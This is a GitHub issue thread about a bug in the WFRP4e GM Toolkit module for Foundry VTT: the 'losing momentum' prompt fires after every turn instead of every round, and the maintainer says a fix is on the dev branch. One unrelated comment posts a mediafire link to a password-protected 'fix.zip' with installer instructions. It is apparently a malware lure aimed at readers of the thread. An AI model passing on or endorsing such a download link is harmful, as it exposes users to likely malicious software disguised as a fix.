### ISSUE TITLE
Losing momentum feature triggers after every PC/NPC turn, not every round

### ISSUE THREAD

**Issue by Dipnotz** [Jagusti/fvtt-wfrp4e-gmtoolkit#275]
## Checklist

- [ X] I have disabled all other modules (except GM Toolkit) and the issue still happens.
- [x ] I can be reached on Discord by my handle: hart_nelson

### Versions
 - Foundry VTT:   Version 12 330 Stable
 - WFRP4e System:  7.24
 - GM Toolkit:   7.1.1

### What should happen
The losing momentum feature pops up at the end of every round

### What is happening
The feature pops up after every character action during combat (PC or NPC)

## Steps to reproduce the issue

1. ...
2. ...
3. etc

**Comment by sammykumar108** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by olavosamp** [comment]
I have encountered this issue as well

**Comment by Jagusti** [comment]
Thanks for posting this @Dipnotz @olavosamp  - can I check whether you are both experiencing the issue on FVTT version 12.331, or just on 12.330.  I undertand there were changes to turn handling in that update which may fix this.

**Comment by Jagusti** [comment]
The fix for this is on the `dev` branch, and will go out with next release. Not sure how soon that is - depends on how breaking WFRP 8.* is. Thanks for raising the issue.
